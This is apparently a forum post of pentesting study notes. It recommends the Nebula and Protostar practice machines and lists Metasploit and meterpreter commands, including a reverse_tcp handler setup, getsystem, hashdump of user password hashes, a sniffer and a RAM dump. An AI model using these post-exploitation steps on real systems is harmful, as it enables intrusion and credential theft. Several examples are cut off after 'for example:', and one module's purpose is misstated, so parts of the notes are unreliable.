Hello :grinning:, greetings to everyone. I am leaving some of the commands and tips I have collected throughout my studies and pentesting certifications; everything can be useful. The post is probably not very well organized, I'm sorry for that, but it can help you with many things in your pentesting.
If you would like to learn hacking and pentesting, I recommend two machines that are very complete and serve to practice many different techniques: Nebula and Protostar.
Nebula: It takes a look at
+ SUID files
+ Permissions
+ Race conditions
+ Shell meta-variables
+ $PATH weaknesses
+ Scripting language weaknesses
+ Binary compilation failures
At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.
Dradis Framework (create a report in one click): https://dradisframework.com/ce/
Some of the modules of Metasploit
background (sends the current session to the background; then interact with a session again with)
sessions -i 2 (2 is the session identifier)
meterpreter > load -l
meterpreter > load sniffer
migrate PID (migrate the meterpreter into another process, selected by its PID)
Post exploitation basically means the phases of operation once a victim's system has been compromised by the attacker.
If we already have a compromised machine and we want to see all the post-exploitation modules, just type post/windows + Enter and we can see the modules that Metasploit offers us.
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently, meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp used on all others.
post/windows/gather/enum_logged_on_users (view logged-on users)
post/windows/gather/checkvm (check if it is a virtual machine)
post/windows/gather/win_privs (escalate privileges)
If we need a reverse shell from Metasploit we can use the multi handler. For example, suppose we already have the machine compromised but we do not have a reverse shell; we follow these steps:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.99.243 (example IP)
set LPORT 4444
exploit -j (runs the handler as a background job)
jobs (lists the jobs that are running in the background)
Web server in Python (2.7):
python -m SimpleHTTPServer 8000
Web server in Python (3.x):
python -m http.server 8000
Some of the methodology for when we have gained access to a machine, we have a user with low privileges and, of course, we want to get root. Suppose we have an exploit to launch and we escalate privileges:
We have obtained privileges and are now NT AUTHORITY\SYSTEM.
We can see all user hashes by typing hashdump.
Also, if we have a local exploit and we launch it, for example a UAC bypass, it is probably exploitable on an unpatched Windows 7.
load -l (the list of extensions we can load)
set session 5 (connect to session number 5)
getsystem (we can test whether we get SYSTEM automatically)
load sniffer (we load a sniffer)
You could investigate the sniffer further and the other options it has.
Do not forget that while you load more extensions into the process, the meterpreter's memory grows; a good option is to migrate to another process, which also helps in case of losing the session, for example:
You can also use this Metasploit module to inject the meterpreter into all the processes that it can:
If we want to dump the victim's RAM:
set Session x
set REXEPATH C:
I hope something is helpful, thanks.